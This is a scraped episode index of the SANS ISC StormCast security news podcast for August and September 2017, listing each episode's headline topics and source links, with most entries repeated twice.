No IPv6? Challenge Accepted https://isc.sans.edu/forums/diary/No+IPv6+Challenge+Accepted+Part+1/22820/ Exploiting CVE-2017-8759 https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/ Wordpress Plugin Found With Backdoor https://www.pluginvulnerabilities.com/2017/09/11/wordpress-poor-handling-of-plugin-security-exacerbates-malicious-takeover-of-display-widgets/
9/14/20175 minutes
Episode Artwork

ISC StormCast for Wednesday, September 13th 2017

Microsoft Patch Tuesday https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html https://technet.microsoft.com/security/advisories BlueBorne Bluetooth Vulnerability http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf
9/13/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, September 13th 2017

Microsoft Patch Tuesday https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html https://technet.microsoft.com/security/advisories BlueBorne Bluetooth Vulnerability http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf
9/13/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, September 12th 2017

Cisco Struts Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce Google Chrome Warning Users of Anti-Malware SSL Interception https://twitter.com/sashaperigo/status/906263091624591360 Machinelearning To Identify Malicious TLS Connections https://arxiv.org/pdf/1607.01639.pdf Comodo Breaking CAA Standard https://www.mail-archive.com/[email protected]/msg08027.html
9/12/20176 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, September 12th 2017

Cisco Struts Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce Google Chrome Warning Users of Anti-Malware SSL Interception https://twitter.com/sashaperigo/status/906263091624591360 Machinelearning To Identify Malicious TLS Connections https://arxiv.org/pdf/1607.01639.pdf Comodo Breaking CAA Standard https://www.mail-archive.com/[email protected]/msg08027.html
9/12/20176 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, September 11th 2017

Analyzing JPEG Files https://isc.sans.edu/forums/diary/Analyzing+JPEG+files/22806/ Auditing Windows With WINspect https://isc.sans.edu/forums/diary/Windows+Auditing+with+WINspect/22810/ Windows PSSetLoadImageNotifyRoutine Vulnerability https://breakingmalware.com/documentation/windows-pssetloadimagenotifyroutine-callbacks-good-bad-unclear-part-1/ IOTA Cryptocurrency Vulnerable Hash Function https://medium.com/@neha/cryptographic-vulnerabilities-in-iota-9a6a9ddc4367
9/11/20175 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, September 11th 2017

Analyzing JPEG Files https://isc.sans.edu/forums/diary/Analyzing+JPEG+files/22806/ Auditing Windows With WINspect https://isc.sans.edu/forums/diary/Windows+Auditing+with+WINspect/22810/ Windows PSSetLoadImageNotifyRoutine Vulnerability https://breakingmalware.com/documentation/windows-pssetloadimagenotifyroutine-callbacks-good-bad-unclear-part-1/ IOTA Cryptocurrency Vulnerable Hash Function https://medium.com/@neha/cryptographic-vulnerabilities-in-iota-9a6a9ddc4367
9/11/20175 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, September 8th 2017

Yet Another Struts RCE Vulnerability https://struts.apache.org/docs/s2-053.html Equifax Compromise https://www.bloomberg.com/news/articles/2017-09-07/three-equifax-executives-sold-stock-before-revealing-cyber-hack Hash Extension Flaws https://isc.sans.edu/forums/diary/Modern+Web+Application+Penetration+Testing+Hash+Length+Extension+Attacks/22792/ Matt Hosburgh: Offensive Intrusion Analysis: Uncovering Insiders with Threat Hunting and Active Defense
9/8/201715 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, September 8th 2017

Yet Another Struts RCE Vulnerability https://struts.apache.org/docs/s2-053.html Equifax Compromise https://www.bloomberg.com/news/articles/2017-09-07/three-equifax-executives-sold-stock-before-revealing-cyber-hack Hash Extension Flaws https://isc.sans.edu/forums/diary/Modern+Web+Application+Penetration+Testing+Hash+Length+Extension+Attacks/22792/ Matt Hosburgh: Offensive Intrusion Analysis: Uncovering Insiders with Threat Hunting and Active Defense
9/8/201715 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, September 7th 2017

Struts2 Metasploit Module https://github.com/rapid7/metasploit-framework/pull/8924/commits/5ea83fee5ee8c23ad95608b7e2022db5b48340ef Google Docs Table With Hacked MongoDB Databases https://docs.google.com/spreadsheets/d/1QonE9oeMOQHVh8heFIyeqrjfKEViL0poLnY8mAakKhM/edit#gid=1781677175 Bypassing Cloudflare https://rhinosecuritylabs.com/cloud-security/cloudflare-bypassing-cloud-security/
9/7/20175 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, September 7th 2017

Struts2 Metasploit Module https://github.com/rapid7/metasploit-framework/pull/8924/commits/5ea83fee5ee8c23ad95608b7e2022db5b48340ef Google Docs Table With Hacked MongoDB Databases https://docs.google.com/spreadsheets/d/1QonE9oeMOQHVh8heFIyeqrjfKEViL0poLnY8mAakKhM/edit#gid=1781677175 Bypassing Cloudflare https://rhinosecuritylabs.com/cloud-security/cloudflare-bypassing-cloud-security/
9/7/20175 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, September 6th 2017

A Look Back At Nira and What's Next https://isc.sans.edu/forums/diary/The+Mirai+Botnet+A+Look+Back+and+Ahead+At+Whats+Next/22786/ New Struts Vulnerability and Patch https://isc.sans.edu/forums/diary/Struts+vulnerability+patch+released+by+apache+patch+now/22788 Mastercard Internet Gateway Service Flaw http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/ Mac OS X High Sierra Insecure Kernel Module Loading https://objective-see.com/blog/blog_0x21.html
9/6/20176 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, September 6th 2017

A Look Back At Nira and What's Next https://isc.sans.edu/forums/diary/The+Mirai+Botnet+A+Look+Back+and+Ahead+At+Whats+Next/22786/ New Struts Vulnerability and Patch https://isc.sans.edu/forums/diary/Struts+vulnerability+patch+released+by+apache+patch+now/22788 Mastercard Internet Gateway Service Flaw http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/ Mac OS X High Sierra Insecure Kernel Module Loading https://objective-see.com/blog/blog_0x21.html
9/6/20176 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, September 5th 2017

Locky Ransom Ware is Back and This Time Pretents to Be a Font https://isc.sans.edu/forums/diary/Malspam+pushing+Locky+ransomware+tries+HoeflerText+notifications+for+Chrome+and+FireFox/22776/ When is a PDF Just a PDF? https://isc.sans.edu/forums/diary/It+is+a+resume+Part+1/22780/ Asterisk Vulnerable to RTPBleed https://github.com/EnableSecurity/advisories/tree/master/ES2017-04-asterisk-rtp-bleed Arris AT&T Modems With Backdoor https://www.nomotion.net/blog/sharknatto/
9/5/20176 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, September 5th 2017

Locky Ransom Ware is Back and This Time Pretents to Be a Font https://isc.sans.edu/forums/diary/Malspam+pushing+Locky+ransomware+tries+HoeflerText+notifications+for+Chrome+and+FireFox/22776/ When is a PDF Just a PDF? https://isc.sans.edu/forums/diary/It+is+a+resume+Part+1/22780/ Asterisk Vulnerable to RTPBleed https://github.com/EnableSecurity/advisories/tree/master/ES2017-04-asterisk-rtp-bleed Arris AT&T Modems With Backdoor https://www.nomotion.net/blog/sharknatto/
9/5/20176 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, September 1st 2017

Is Remote Work Feasible in a SOC? https://isc.sans.edu/forums/diary/Remote+SOC+Workers+Concerns/22772/ Linux Random Number Generator Reviewed https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Studien/LinuxRNG/LinuxRNG_EN.pdf?__blob=publicationFile&v=5 Adobe Acrobat and Reader Security Patch https://blogs.adobe.com/psirt/?p=1484 Turning Speakers into Microphones https://www.usenix.org/system/files/conference/woot17/woot17-paper-guri.pdf
9/1/201714 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, September 1st 2017

Is Remote Work Feasible in a SOC? https://isc.sans.edu/forums/diary/Remote+SOC+Workers+Concerns/22772/ Linux Random Number Generator Reviewed https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Studien/LinuxRNG/LinuxRNG_EN.pdf?__blob=publicationFile&v=5 Adobe Acrobat and Reader Security Patch https://blogs.adobe.com/psirt/?p=1484 Turning Speakers into Microphones https://www.usenix.org/system/files/conference/woot17/woot17-paper-guri.pdf
9/1/201714 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, August 31st 2017

IoT Gear Affected by ConnMan Vulnerablity http://connmando.nri-secure.co.jp/index.html Trickbot Going After Coinbase https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency Pacemakers Need Patch https://www.fda.gov/MedicalDevices/Safety/AlertsandNotices/ucm573669.htm Inaudible Voice Commands https://arxiv.org/pdf/1708.07238.pdf
8/30/20176 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, August 31st 2017

IoT Gear Affected by ConnMan Vulnerablity http://connmando.nri-secure.co.jp/index.html Trickbot Going After Coinbase https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency Pacemakers Need Patch https://www.fda.gov/MedicalDevices/Safety/AlertsandNotices/ucm573669.htm Inaudible Voice Commands https://arxiv.org/pdf/1708.07238.pdf
8/30/20176 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, August 30th 2017

Another Chrome Extension Banking Malware https://isc.sans.edu/forums/diary/Second+Google+Chrome+Extension+Banker+Malware+in+Two+Weeks/22766/ Vulnerable Docker VM https://www.notsosecure.com/vulnerable-docker-vm/ Large Spam E-Mail and Password List Discovered https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/
8/30/20176 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, August 30th 2017

Another Chrome Extension Banking Malware https://isc.sans.edu/forums/diary/Second+Google+Chrome+Extension+Banker+Malware+in+Two+Weeks/22766/ Vulnerable Docker VM https://www.notsosecure.com/vulnerable-docker-vm/ Large Spam E-Mail and Password List Discovered https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/
8/30/20176 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, August 29th 2017

Survey of Recent DVR Attacks https://isc.sans.edu/forums/diary/An+Update+On+DVR+Malware+A+DVR+Torture+Chamber/22762/ Disabling Intel ME http://blog.ptsecurity.com/2017/08/disabling-intel-me.html Wire-X Takedown https://blogs.akamai.com/2017/08/the-wirex-botnet-an-example-of-cross-organizational-cooperation.html
8/29/20175 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, August 29th 2017

Survey of Recent DVR Attacks https://isc.sans.edu/forums/diary/An+Update+On+DVR+Malware+A+DVR+Torture+Chamber/22762/ Disabling Intel ME http://blog.ptsecurity.com/2017/08/disabling-intel-me.html Wire-X Takedown https://blogs.akamai.com/2017/08/the-wirex-botnet-an-example-of-cross-organizational-cooperation.html
8/29/20175 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, August 28th 2017

Analyzing 7zip Malware https://isc.sans.edu/forums/diary/Malware+analysis+searching+for+dots/22758/ Worldwide DNS Manipulation Survey https://people.eecs.berkeley.edu/~pearce/papers/dns_usenix_2017.pdf Sophos Withdraws UTM Update https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released Crypto Currency Malware https://resources.netskope.com/h/i/361264722-coin-mining-malware-heads-to-the-cloud-with-zminer
8/28/20176 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, August 28th 2017

Analyzing 7zip Malware https://isc.sans.edu/forums/diary/Malware+analysis+searching+for+dots/22758/ Worldwide DNS Manipulation Survey https://people.eecs.berkeley.edu/~pearce/papers/dns_usenix_2017.pdf Sophos Withdraws UTM Update https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released Crypto Currency Malware https://resources.netskope.com/h/i/361264722-coin-mining-malware-heads-to-the-cloud-with-zminer
8/28/20176 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, August 25th 2017

Critical HPE iLo Vulnerability http://h20565.www2.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us Facebook Messenger Spam Leads to Malware https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-messenger/81590/ iOS 10.3.1 Kernel Exploit Released https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/ Samsung Bricks Smart TVs With Update https://eu.community.samsung.com/t5/TV-Audio-Video/Samsung-MU-Series-2017-Smart-TV-s-will-do-nothing-after-Samsung/td-p/250277 John Bambenek's DGA Feeds http://osint.bambenekconsulting.com/feeds/c2-ipmasterlist.txt
8/25/201712 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, August 25th 2017

Critical HPE iLo Vulnerability http://h20565.www2.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us Facebook Messenger Spam Leads to Malware https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-messenger/81590/ iOS 10.3.1 Kernel Exploit Released https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/ Samsung Bricks Smart TVs With Update https://eu.community.samsung.com/t5/TV-Audio-Video/Samsung-MU-Series-2017-Smart-TV-s-will-do-nothing-after-Samsung/td-p/250277 John Bambenek's DGA Feeds http://osint.bambenekconsulting.com/feeds/c2-ipmasterlist.txt
8/25/201712 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, August 24th 2017

Malware Loading Avast Safe Zone Browser https://isc.sans.edu/forums/diary/Malicious+script+dropping+an+executable+signed+by+Avast/22748/ Ropemaker E-Mail Content https://www.mimecast.com/globalassets/documents/whitepapers/wp_the_ropemaker_email_exploit.pdf Cloud Based Accounts Increasingly a Target https://www.microsoft.com/en-us/security/intelligence-report More Malware Found At Ukraining Accounting Software Makers https://issp.ua/issp_system_images/UPD_samples_analysis_eng.pdf
8/24/20175 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, August 24th 2017

Malware Loading Avast Safe Zone Browser https://isc.sans.edu/forums/diary/Malicious+script+dropping+an+executable+signed+by+Avast/22748/ Ropemaker E-Mail Content https://www.mimecast.com/globalassets/documents/whitepapers/wp_the_ropemaker_email_exploit.pdf Cloud Based Accounts Increasingly a Target https://www.microsoft.com/en-us/security/intelligence-report More Malware Found At Ukraining Accounting Software Makers https://issp.ua/issp_system_images/UPD_samples_analysis_eng.pdf
8/24/20175 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, August 23rd 2017

Elcomsoft Releases Ability to Retrieve Apple Keychain from iCloud https://www.elcomsoft.com/eppb.html Mapping Rooms With Smart Speakers http://musicattacks.cs.washington.edu/activity-information-leakage.pdf Netcraft Identifies .fish Domain Used For Phishing https://news.netcraft.com/archives/2017/08/21/first-fishy-phishing-sites-sighted.html
8/23/20175 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, August 23rd 2017

Elcomsoft Releases Ability to Retrieve Apple Keychain from iCloud https://www.elcomsoft.com/eppb.html Mapping Rooms With Smart Speakers http://musicattacks.cs.washington.edu/activity-information-leakage.pdf Netcraft Identifies .fish Domain Used For Phishing https://news.netcraft.com/archives/2017/08/21/first-fishy-phishing-sites-sighted.html
8/23/20175 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, August 22nd 2017

Hackers Scam $ 500,000 From Enigma Digital Currency Investors http://www.theregister.co.uk/2017/08/21/enigma_digital_currency_investors_scammed/ Bitcoin Privacy Threats https://arxiv.org/abs/1708.04748 $500 iPhone PIN Brute Forcing Box https://www.youtube.com/watch?v=IXglwbyMydM SyncCrypt Bypasses Antivirus Filters With Images https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/
8/22/20175 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, August 22nd 2017

Hackers Scam $ 500,000 From Enigma Digital Currency Investors http://www.theregister.co.uk/2017/08/21/enigma_digital_currency_investors_scammed/ Bitcoin Privacy Threats https://arxiv.org/abs/1708.04748 $500 iPhone PIN Brute Forcing Box https://www.youtube.com/watch?v=IXglwbyMydM SyncCrypt Bypasses Antivirus Filters With Images https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/
8/22/20175 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, August 21st 2017

EngineBox Banking Malware https://isc.sans.edu/forums/diary/EngineBox+Malware+Supports+10+Brazilian+Banks/22736/ It's Not An Invoice https://isc.sans.edu/forums/diary/Its+Not+An+Invoice/22738/ iOS Secure Enclave Key Posted https://www.theiphonewiki.com/wiki/Greensburg_14G60_%28iPhone6,1%29 Vulnerabilities in FoxIT PDF Reader https://www.thezdi.com/blog/2017/8/17/busting-myths-in-foxit-reader
8/20/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, August 21st 2017

EngineBox Banking Malware https://isc.sans.edu/forums/diary/EngineBox+Malware+Supports+10+Brazilian+Banks/22736/ It's Not An Invoice https://isc.sans.edu/forums/diary/Its+Not+An+Invoice/22738/ iOS Secure Enclave Key Posted https://www.theiphonewiki.com/wiki/Greensburg_14G60_%28iPhone6,1%29 Vulnerabilities in FoxIT PDF Reader https://www.thezdi.com/blog/2017/8/17/busting-myths-in-foxit-reader
8/20/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, August 18th 2017

Maldoc with auto-updated link https://isc.sans.edu/forums/diary/Maldoc+with+autoupdated+link/22730/ Rowhammer is Back: SSD Memory Affected https://www.usenix.org/system/files/conference/woot17/woot17-paper-kurmus.pdf Nathaniel Quist: Active Defense in a Labyrinth of Deception https://www.sans.org/reading-room/whitepapers/ActiveDefense/active-defense-labyrinth-deception-37462
8/18/201716 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, August 18th 2017

Maldoc with auto-updated link https://isc.sans.edu/forums/diary/Maldoc+with+autoupdated+link/22730/ Rowhammer is Back: SSD Memory Affected https://www.usenix.org/system/files/conference/woot17/woot17-paper-kurmus.pdf Nathaniel Quist: Active Defense in a Labyrinth of Deception https://www.sans.org/reading-room/whitepapers/ActiveDefense/active-defense-labyrinth-deception-37462
8/18/201716 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, August 17th 2017

Analysis of a Paypal Phishing Kit https://isc.sans.edu/forums/diary/Analysis+of+a+Paypal+phishing+kit/22726/ ShadowPad Backdoor in NetSarang Equipment https://securelist.com/shadowpad-in-corporate-networks/81432/ Solving Captcha Audio Challenges http://uncaptcha.cs.umd.edu/papers/uncaptcha_woot17.pdf
8/17/20176 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, August 17th 2017

Analysis of a Paypal Phishing Kit https://isc.sans.edu/forums/diary/Analysis+of+a+Paypal+phishing+kit/22726/ ShadowPad Backdoor in NetSarang Equipment https://securelist.com/shadowpad-in-corporate-networks/81432/ Solving Captcha Audio Challenges http://uncaptcha.cs.umd.edu/papers/uncaptcha_woot17.pdf
8/17/20176 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, August 16th 2017

Malspam Pushing Trickbot Banking Trojan https://isc.sans.edu/forums/diary/Malspam+pushing+Trickbot+banking+Trojan/22720/ Banker Google Chrome Extension Targeting Brazil https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ DJI "Go" App May Be Using JSPatch To Modify Applications After Install https://www.rcgroups.com/forums/showpost.php?p=38096850&postcount=2713 Smartlocks Bricked After Auto-Update http://www.securitysales.com/news/smart-locks-lobotomized-failed-update/
8/16/20176 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, August 16th 2017

Malspam Pushing Trickbot Banking Trojan https://isc.sans.edu/forums/diary/Malspam+pushing+Trickbot+banking+Trojan/22720/ Banker Google Chrome Extension Targeting Brazil https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ DJI "Go" App May Be Using JSPatch To Modify Applications After Install https://www.rcgroups.com/forums/showpost.php?p=38096850&postcount=2713 Smartlocks Bricked After Auto-Update http://www.securitysales.com/news/smart-locks-lobotomized-failed-update/
8/16/20176 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, August 15th 2017

When A Malicious Looking E-Mail Turns Out to be "just" spam https://isc.sans.edu/forums/diary/Sometimes+its+just+SPAM/22716/ Android iOS Intra-Library Collusion https://arxiv.org/abs/1708.03520 SonicSpy: Android Spyware Apps https://blog.lookout.com/sonicspy-spyware-threat-technical-research Checking For Breached Passwords in Active Directory https://jacksonvd.com/checking-for-breached-passwords-in-active-directory/
8/15/20176 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, August 15th 2017

When A Malicious Looking E-Mail Turns Out to be "just" spam https://isc.sans.edu/forums/diary/Sometimes+its+just+SPAM/22716/ Android iOS Intra-Library Collusion https://arxiv.org/abs/1708.03520 SonicSpy: Android Spyware Apps https://blog.lookout.com/sonicspy-spyware-threat-technical-research Checking For Breached Passwords in Active Directory https://jacksonvd.com/checking-for-breached-passwords-in-active-directory/
8/15/20176 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, August 14th 2017

Outlook Web Access Based Attacks https://isc.sans.edu/forums/diary/Outlook+Web+Access+based+attacks/22710/ The Good Phishing Email https://isc.sans.edu/forums/diary/The+Good+Phishing+Email/22712/ Git/CVS/Mercurial and others: ssh vulnerablity http://blog.recurity-labs.com/2017-08-10/scm-vulns Postgresql Vulnerablities https://bugzilla.redhat.com/show_bug.cgi?id=1477185
8/14/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, August 14th 2017

Outlook Web Access Based Attacks https://isc.sans.edu/forums/diary/Outlook+Web+Access+based+attacks/22710/ The Good Phishing Email https://isc.sans.edu/forums/diary/The+Good+Phishing+Email/22712/ Git/CVS/Mercurial and others: ssh vulnerablity http://blog.recurity-labs.com/2017-08-10/scm-vulns Postgresql Vulnerablities https://bugzilla.redhat.com/show_bug.cgi?id=1477185
8/14/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, August 11th 2017

Maldoc Analysis With ViperMonkey https://isc.sans.edu/forums/diary/Maldoc+Analysis+with+ViperMonkey/22702/ Microsoft Joins Google/Mozilla in Banishing WoSign and StartCom From Trusted CA List https://blogs.technet.microsoft.com/mmpc/2017/08/08/microsoft-to-remove-wosign-and-startcom-certificates-in-windows-10/ SMS Touch App Leaking Messages https://www.zscaler.com/blogs/research/mobile-app-wall-shame-sms-touch Mac Adware Mughthesec https://objective-see.com/blog/blog_0x20.html
8/11/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, August 11th 2017

Maldoc Analysis With ViperMonkey https://isc.sans.edu/forums/diary/Maldoc+Analysis+with+ViperMonkey/22702/ Microsoft Joins Google/Mozilla in Banishing WoSign and StartCom From Trusted CA List https://blogs.technet.microsoft.com/mmpc/2017/08/08/microsoft-to-remove-wosign-and-startcom-certificates-in-windows-10/ SMS Touch App Leaking Messages https://www.zscaler.com/blogs/research/mobile-app-wall-shame-sms-touch Mac Adware Mughthesec https://objective-see.com/blog/blog_0x20.html
8/11/20175 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, August 10th 2017

DirectDefense Accuses Carbon Black of Data Leak https://www.carbonblack.com/2017/08/09/directdefense-incorrectly-asserts-architectural-flaw-in-cb-response/ https://www.directdefense.com/harvesting-cb-response-data-leaks-fun-profit/ Vulnerabilities in Solar Generation https://horusscenario.com Hunting Malicious npm Packages https://duo.com/blog/hunting-malicious-npm-packages
8/10/20176 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, August 10th 2017

DirectDefense Accuses Carbon Black of Data Leak https://www.carbonblack.com/2017/08/09/directdefense-incorrectly-asserts-architectural-flaw-in-cb-response/ https://www.directdefense.com/harvesting-cb-response-data-leaks-fun-profit/ Vulnerabilities in Solar Generation https://horusscenario.com Hunting Malicious npm Packages https://duo.com/blog/hunting-malicious-npm-packages
8/10/20176 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, August 9th 2017

Microsoft Updates https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+August+2017/22694/ Adobe Updates https://helpx.adobe.com/security.html Android Patches https://source.android.com/security/bulletin/2017-08-01 How Are People Fooled By This? Email To Sign a Contract Provides Malware https://isc.sans.edu/forums/diary/How+are+people+fooled+by+this+Email+to+sign+a+contract+provides+malware+instead/22696/
8/9/20175 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, August 9th 2017

Microsoft Updates https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+August+2017/22694/ Adobe Updates https://helpx.adobe.com/security.html Android Patches https://source.android.com/security/bulletin/2017-08-01 How Are People Fooled By This? Email To Sign a Contract Provides Malware https://isc.sans.edu/forums/diary/How+are+people+fooled+by+this+Email+to+sign+a+contract+provides+malware+instead/22696/
8/9/20175 minutes, 57 seconds
Episode Artwork

ISC StormCast for Tuesday, August 8th 2017

PHPMyAdmin Scans https://isc.sans.edu/forums/diary/Increase+of+phpMyAdmin+scans/22688/ Hotspot Shield Leakes Private User Data https://cdt.org/files/2017/08/FTC-CDT-VPN-complaint-8-7-17.pdf Debian Turning Off Support for TLS 1.0/1.1 https://lists.debian.org/debian-devel-announce/2017/08/msg00004.html Ongoing Phishing Attacks Against Google Chrome Plugin Developers https://www.bleepingcomputer.com/news/security/chrome-extension-developers-under-a-barrage-of-phishing-attacks/
8/7/20175 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, August 8th 2017

PHPMyAdmin Scans https://isc.sans.edu/forums/diary/Increase+of+phpMyAdmin+scans/22688/ Hotspot Shield Leakes Private User Data https://cdt.org/files/2017/08/FTC-CDT-VPN-complaint-8-7-17.pdf Debian Turning Off Support for TLS 1.0/1.1 https://lists.debian.org/debian-devel-announce/2017/08/msg00004.html Ongoing Phishing Attacks Against Google Chrome Plugin Developers https://www.bleepingcomputer.com/news/security/chrome-extension-developers-under-a-barrage-of-phishing-attacks/
8/7/20175 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, August 7th 2017

Opengraph Used to Obfuscate Facebook Links https://isc.sans.edu/forums/diary/Use+of+the+Open+Graph+Protocol+to+Disguise+Malicious+Facebook+Links/22684/ Cerber Adding Bitcoin and Password Stealer to Crypto Ransomware http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-ransomware-evolves-now-steals-bitcoin-wallets/ Symantec Selling Certificate Business To Digicert https://www.heise.de/security/meldung/Nachspiel-einer-fatalen-Panne-Symantec-verkauft-Zertifikatssparte-an-DigiCert-3793482.html Siemens Medical Imaging Systems Vulnerable to Old Windows Flaws https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-822184.pdf
8/7/20176 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, August 7th 2017

Opengraph Used to Obfuscate Facebook Links https://isc.sans.edu/forums/diary/Use+of+the+Open+Graph+Protocol+to+Disguise+Malicious+Facebook+Links/22684/ Cerber Adding Bitcoin and Password Stealer to Crypto Ransomware http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-ransomware-evolves-now-steals-bitcoin-wallets/ Symantec Selling Certificate Business To Digicert https://www.heise.de/security/meldung/Nachspiel-einer-fatalen-Panne-Symantec-verkauft-Zertifikatssparte-an-DigiCert-3793482.html Siemens Medical Imaging Systems Vulnerable to Old Windows Flaws https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-822184.pdf
8/7/20176 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, August 4th 2017

Raspberry Pi Honeypot https://github.com/DShield-ISC/dshield Troy Hunt Releases Password List https://haveibeenpwned.com/Passwords Typosquatting npm Packages http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry SEC503: Intrusion Detection in Depth Berlin (Oct 23rd-28th) https://www.sans.org/event/berlin-2017/course/intrusion-detection-in-depth
8/4/20175 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, August 4th 2017

Raspberry Pi Honeypot https://github.com/DShield-ISC/dshield Troy Hunt Releases Password List https://haveibeenpwned.com/Passwords Typosquatting npm Packages http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry SEC503: Intrusion Detection in Depth Berlin (Oct 23rd-28th) https://www.sans.org/event/berlin-2017/course/intrusion-detection-in-depth
8/4/20175 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, August 3rd 2017

Attacking NoSQL Applications https://isc.sans.edu/forums/diary/Attacking+NoSQL+applications+part+2/22676/ Web Developer Chrome Toolbar Replaced with AdWare https://twitter.com/chrispederick Android Banking Trojans https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/ Amazon Stops Selling Blu Smartphones http://www.zdnet.com/article/amazon-halts-blu-phone-sales-over-potential-security-issue/
8/2/20175 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, August 3rd 2017

Attacking NoSQL Applications https://isc.sans.edu/forums/diary/Attacking+NoSQL+applications+part+2/22676/ Web Developer Chrome Toolbar Replaced with AdWare https://twitter.com/chrispederick Android Banking Trojans https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/ Amazon Stops Selling Blu Smartphones http://www.zdnet.com/article/amazon-halts-blu-phone-sales-over-potential-security-issue/
8/2/20175 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, August 2nd 2017

